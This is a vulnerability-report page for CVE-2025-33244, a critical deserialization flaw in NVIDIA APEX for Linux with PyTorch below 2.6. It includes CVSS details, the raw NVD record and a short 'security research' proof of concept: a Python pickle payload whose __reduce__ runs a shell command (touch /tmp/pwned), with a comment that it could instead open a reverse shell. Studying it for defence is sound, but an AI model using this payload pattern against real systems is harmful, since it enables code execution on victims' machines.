Security Vulnerability Report
CVE-2025-33244 CVSS 9.0 CRITICAL

CVE-2025-33244

Published: 2026-03-24 21:16:24
Last Modified: 2026-03-25 15:41:58

Description

NVIDIA APEX for Linux contains a vulnerability where an unauthorized attacker could cause a deserialization of untrusted data. This vulnerability affects environments that use PyTorch versions earlier than 2.6. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, data tampering, and information disclosure.

CVSS Details

CVSS Score: 9.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PyTorch < 2.6
NVIDIA APEX for Linux (see the vendor advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle
import os

# Malicious payload class to execute code upon deserialization
class Exploit:
    def __reduce__(self):
        # Command to execute (e.g., creating a file or reverse shell)
        return (os.system, ('touch /tmp/pwned',))

# Serialize the malicious object
payload = pickle.dumps(Exploit())

# In a real scenario, this payload would be sent to the vulnerable NVIDIA APEX component
# via the vulnerable interface or protocol.
print(f"Generated malicious payload: {payload}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33244", "sourceIdentifier": "[email protected]", "published": "2026-03-24T21:16:24.437", "lastModified": "2026-03-25T15:41:58.280", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA APEX for Linux contains a vulnerability where an unauthorized attacker could cause a deserialization of untrusted data. This vulnerability affects environments that use PyTorch versions earlier than 2.6. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, data tampering, and information disclosure."}, {"lang": "es", "value": "NVIDIA APEX para Linux contiene una vulnerabilidad donde un atacante no autorizado podría causar una deserialización de datos no confiables. Esta vulnerabilidad afecta a entornos que utilizan versiones de PyTorch anteriores a la 2.6. Un exploit exitoso de esta vulnerabilidad podría conducir a la ejecución de código, denegación de servicio, escalada de privilegios, manipulación de datos y revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33244", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5782", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33244", "source": "[email protected]"}]}}